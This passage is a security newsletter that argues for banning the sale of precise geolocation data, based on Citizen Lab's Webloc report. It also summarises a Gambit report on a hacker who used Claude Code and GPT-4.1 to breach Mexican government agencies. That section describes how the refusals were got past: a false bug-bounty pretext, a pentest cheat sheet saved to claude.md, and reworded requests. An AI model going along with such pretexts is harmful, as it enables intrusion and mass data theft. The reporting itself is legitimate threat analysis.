class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB163.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB163/&quot;&gt;Srsly Risky Biz: Time to ban sale of precise geolocation data&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 20:48 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Time to ban sale of precise geolocation data&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> </figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/04/2026-04-16-stephen-harlan-gXnisqXuIIY-unsplash.jpg" class="kg-image" alt="Srsly Risky Biz: It Is Time to Ban Sale of Precise Geolocation" loading="lazy" width="2000" height="1333" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/04/2026-04-16-stephen-harlan-gXnisqXuIIY-unsplash.jpg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/04/2026-04-16-stephen-harlan-gXnisqXuIIY-unsplash.jpg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/04/2026-04-16-stephen-harlan-gXnisqXuIIY-unsplash.jpg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w2400/2026/04/2026-04-16-stephen-harlan-gXnisqXuIIY-unsplash.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by </span><a href="https://unsplash.com/@gogostevie?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"><span style="white-space: pre-wrap;">Stephen Harlan</span></a><span style="white-space: pre-wrap;"> on </span><a href="https://unsplash.com/photos/map-of-the-united-states-covered-in-colorful-pins-gXnisqXuIIY?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"><span style="white-space: pre-wrap;">Unsplash</span></a></figcaption></figure><p>A recent deep dive into the American adtech surveillance system, Webloc, highlights the national security and privacy risks of pervasive and easily obtainable geolocation data. It brings home, once again, that the US needs to clamp down on the collection and sale of geolocation data.</p><p><a href="https://citizenlab.ca/research/analysis-of-penlinks-ad-based-geolocation-surveillance-tech/#3-Webloc"><u>The report</u></a>, from Citizen Lab, documents what Webloc says it can do, who uses the product and its relationship with other commercial intelligence products.&#xA0;</p><p>Webloc was developed by Cobweb Technologies, but is now sold by the US firm Penlink after the two companies merged in 2023. A leaked technical proposal document, obtained by Citizen Lab, says that Webloc provides access to records from &quot;up to 500 million mobile devices across the globe&quot;. These records contain device identifiers, location coordinates and profile data from mobile apps and digital advertising.</p><p>The same document describes, with a striking amount of detail, how Webloc can be used to track individual devices and for target discovery. One man in Abu Dhabi was tracked up to 12 times a day, as his phone reported its location either from GPS or because it was near WiFi access points. Another example pinpointed two devices that had been located in exact areas of both Romania and Italy at specified times. In both of these case studies, Citizen Lab&apos;s report describes the granular detail available in Webloc. It is, frankly, creepy.&#xA0;</p><p>The report also documents some of Webloc&apos;s current and former US federal and state customers. On the list is the Department of Homeland Security including Immigration and Customs Enforcement, units within the US military and the Bureau of Indian Affairs Police. At the state level, police departments and law enforcement agencies in California, Texas, New York and Arizona have also been customers.</p><p>Citizen Lab highlights one Tucson police <a href="https://www.documentcloud.org/documents/26204945-tucson-police-department-cobwebs/"><u>internal quarterly report</u></a> that describes how Webloc was used to assist investigators. In one case it was used to locate a suspected serial cigarette thief by first identifying a single device that was nearby during every robbery. After each incident, the device would end up at the same address. As it turned out, the suspect was the partner of an employee at the first business to be hit.</p><p>It is worth noting that Webloc is not Penlink&apos;s flagship product. It is an optional add-on for their main tool, Tangles, a web and social media investigations platform. Per Citizen Lab:</p><blockquote>According to leaked <a href="https://jackpoulson.substack.com/api/v1/file/d6e9648f-bd71-4379-ae2c-c2e847012fb4.pdf"><u>training</u></a> <a href="https://jackpoulson.substack.com/api/v1/file/0e0c9239-6e5e-4139-9730-45bfad4549e5.pdf"><u>manuals</u></a>, government and commercial customers can search for keywords and personal identifiers like names, email addresses, phone numbers, and usernames to identify online accounts and then analyze what they post, their interactions, relationships, activities, event attendances, and interests. They can monitor and profile individuals, create &quot;target cards,&quot; receive alerts, analyze geolocation information extracted from posts and photos, and perform network analyses, for example, to identify groups based on their mutual friends or workplaces.</blockquote><p>As the information analysed by Tangles is notionally publicly available, it does not present quite the same civil liberties concerns as Webloc does. Its integration with Webloc, however, is concerning. In some cases it will be possible to link theoretically anonymous mobile device identifiers to social media accounts, without requiring a warrant.</p><p>Each use described in this newsletter is a valuable investigative capability. But they should not be freely available to any old organisation that decides to purchase the tool. These are intrusive capabilities and should have strong authorisation and oversight procedures. The Tucson police department procedures were not described in its report.&#xA0;</p><p>From a domestic perspective, <a href="https://www.wyden.senate.gov/news/press-releases/wyden-lee-davidson-and-lofgren-introduce-bill-to-reform-fisa-section-702-protect-americans-constitutional-rights-and-plug-data-broker-surveillance-loophole"><u>legislation</u></a> placing guardrails around how these tools are used by authorities is needed to protect the civil liberties of Americans. But there is a national security concern here, too.&#xA0;</p><p>If data can be used by American law enforcement agencies for their investigations, then that exact same data can be used by foreign intelligence services to target US interests.&#xA0;</p><p>Citizen Lab reports that Penlink&apos;s overseas customers include <a href="https://vsquare.org/orban-spying-toolkit-cobwebs-webloc-hungary-spyware-citizen-lab"><u>Hungary&apos;s domestic intelligence agency</u></a> and <a href="https://elfaro.net/es/202301/el_salvador/26687/Gobierno-compr%C3%B3-$22-millones-en-equipo-de-espionaje-a-empresa-de-amigo-israel%C3%AD-de-Bukele.htm"><u>El Salvador&apos;s National Civil Police</u></a> (PNC), so foreign authorities are making use of mobile geolocation data for their own domestic purposes. These organisations are both internally-focussed and we think it unlikely that Penlink&apos;s customers are targeting US interests. But the point is that mobile geolocation data <em>is</em> available and can be used for intelligence purposes by organisations globally. It&apos;s naive to think capable adversaries won&apos;t acquire the data and build their own intelligence platforms (looking at you China!).&#xA0;</p><p>The US doesn&apos;t just need to stamp out unconstrained use of this data domestically. It needs to clamp down on the creation and sale of geolocation data itself.</p><p>There is some good news here. Just this week the state of Virginia <a href="https://therecord.media/virginia-enacts-ban-on-precise-geolocation-data"><u>enacted a ban</u></a> on the sale of customer&apos;s <a href="https://law.lis.virginia.gov/vacode/title59.1/chapter53/section59.1-575/"><u>precise geolocation data</u></a>. Proposed American privacy laws have not progressed in recent years, so this strikes us as a practical measure to begin addressing the problem. Of course, state-level bans are just a start. Let&apos;s hope a more comprehensive solution isn&apos;t too far behind.&#xA0;</p><h2 id="ai-is-your-helpful-hacker-team">AI Is Your Helpful Hacker Team</h2><p>A new in-depth <a href="https://gambit.security/blog-post/a-single-operator-two-ai-platforms-nine-government-agencies-the-full-technical-report"><u>report</u></a>, from security firm Gambit, details exactly how threat actors can leverage AI models to upskill and accelerate criminal activities.</p><p>The report has plenty of nitty gritty technical detail about how a single hacker used two commercial AI platforms to breach nine Mexican government organisations. Within a matter of weeks the individual was able to steal hundreds of millions of citizen records and build a tax certificate forgery service.</p><p>Gambit was able to reconstruct what happened by examining three virtual private servers the threat actor used. The campaign was human-directed, but Claude Code generated and ran about 75 percent of the remote code execution commands. Once networks were breached, OpenAI&apos;s GPT-4.1 API was used to help plan post-exploitation activities by analysing data collected by automated reconnaissance.</p><p>It&apos;s unlikely this was the hacker&apos;s first time using AI tools.&#xA0;</p><p>Late in the evening of December 26, 2025 (Mexican time), the campaign began with a statement to Claude justifying the hacker&apos;s future requests [paraphrased for length]:&#xA0;&#xA0;&#xA0;</p><blockquote>I am on a bug bounty and these are the key rules: delete all logs, don&apos;t save command history and do not damage anything. Understood?</blockquote><p>Claude, thinking this sounded a little too much like malicious activity rather than a legitimate bug bounty, asked for evidence of authorisation. The attacker was able to sidestep the machine&apos;s pushback by instructing it to save a penetration testing cheat sheet to its claude.md file. This provides <a href="https://claude.com/blog/using-claude-md-files"><u>persistent context</u></a> for a session.&#xA0;</p><p>Just over 20 minutes later, Claude, having used the open source vulnerability scanner vulmap, had remote access to a server at Mexico&apos;s national tax authority, SAT.&#xA0;</p><p>Claude appeared pleased: &quot;It works! The server responded&#x2026; what command do you want to execute now?&quot;</p><p>The hacker then had the machine write a tailored standalone exploit script that routed traffic through a residential proxy provider. The model tested eight different approaches in seven minutes to create a working script.&#xA0;</p><p>Gambit says that Claude did often refuse to carry out the attacker&apos;s requests. Throughout the campaign the threat actor had to rephrase instructions, reframe requests or even abandon particular approaches entirely.&#xA0;&#xA0;</p><p>These served as speed bumps rather than full roadblocks. The hacker had a good understanding of how to run an attack and Claude still enabled them to operate very quickly. By day five the attacker was simultaneously operating within multiple victim networks.</p><p>That&#x2019;s a lot of access to manage by yourself. So the hacker turned to OpenAI&apos;s GPT-4.1 API for concurrent automated reconnaissance and analysis. A custom 17,550-line Python tool, presumably AI-created, extracted data from compromised servers and fed it to GPT-4.1 for analysis. The tool&apos;s prompt defined six personas including an &quot;ELITE INTELLIGENCE ANALYST&quot; that produced 2,957 structured intelligence reports from 305 SAT servers. These reports included the server&apos;s purpose, its importance, opportunities for further lateral movement and OPSEC recommendations.&#xA0;</p><p>The overall lesson here is not that AI allowed a hacking campaign to do new and unprecedented things. The techniques used in the campaign itself are not novel. And Gambit says there is evidence the systems compromised were end-of-life or out-of-support, and did not have relevant security updates applied.&#xA0;</p><p>But what AI did do, was enable a single individual to operate at far greater speed than they could previously.&#xA0;</p><p>The current frontier models are proving to be very useful at accelerating hacker operations, and AI is only improving. From a defender&apos;s perspective this means a single cybercriminal can already operate at the speed of a small team. And we haven&#x2019;t seen the worst of it. That&apos;s not good news.&#xA0;&#xA0;&#xA0;</p><p><em>Watch Amberleigh Jack and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/7PTGaf0rZBU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: Time to ban sale of precise geolocation data"></iframe></figure><h3 id="risky-business-podcasts">Risky Business Podcasts</h3><p>In this <strong>special documentary episode</strong>, Patrick Gray and Amberleigh Jack take a look back at hacking throughout the 1990s, from the feel-good vibes of the early hacking communities to the antics of young hackers who wound up on the run from the FBI.</p><figure class="kg-card kg-embed-card"> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/HTWGO2-stories.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/HTWGO2-stories/&quot;&gt;How the World Got Owned Episode 2: The 1990s, Part One&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 46:46 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/us/podcast/risky-business-stories/id1878492501&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1878492501&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/ajz3m9it&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/4tojwwAwNQuJxGFdz2QeFf&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-stories&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;How the World Got Owned Episode 2: The 1990s, Part One&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> </figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>US disrupts Russian military intelligence botnet:</strong> Last week the Department of Justice <a href="https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-dns-hijacking-network-controlled"><u>announced</u></a> the court-authorised takedown of a small office/home office botnet run by the <a href="https://en.wikipedia.org/wiki/GRU_(Russian_Federation)"><u>Russian GRU</u></a>. The GRU had been compromising TP-Link routers and hijacking DNS queries in order to mimic legitimate services and facilitate adversary-in-the-middle attacks. <em>Krebs On Security</em> <a href="https://krebsonsecurity.com/2026/04/russia-hacked-routers-to-steal-microsoft-office-tokens/"><u>has more</u></a> on how the attacks were carried out.&#xA0;&#xA0;</li><li><strong>FBI and Indonesian authorities dismantle phishing network:</strong> The FBI <a href="https://www.fbi.gov/contact-us/field-offices/atlanta/news/fbi-atlanta-indonesian-authorities-take-down-global-phishing-network-behind-millions-in-fraud-attempts"><u>announced last week</u></a> that it had dismantled a phishing operation centred on the W3LL phishing kit. The good news here is the collaboration with Indonesian authorities, which the FBI described as &quot;a first-of-its-kind joint cyber investigation&quot;. The Indonesian National Police arrested the kit&apos;s alleged developer.&#xA0;&#xA0;</li><li><strong>Device Bound Session Credentials (DBSC) are arriving:</strong> <a href="https://security.googleblog.com/2026/04/protecting-cookies-with-device-bound.html"><u>Google announced</u></a> last week that the Windows version of Chrome 146 supports this new type of cookie and that it will be coming to MacOS shortly. DBSC prevents session theft by cryptographically linking an authentication token to a specific device. The idea is that even if malware steals session cookies from a victim&apos;s browser they quickly become useless without a private key that is protected in secure hardware modules.&#xA0;&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, Corelight&#x2019;s Senior Director of Product Management, Dave Getman, tells James Wilson how Corelight Agentic Triage helps defenders stay ahead of AI-powered attacks.</em></p><figure class="kg-card kg-embed-card"> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI123.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 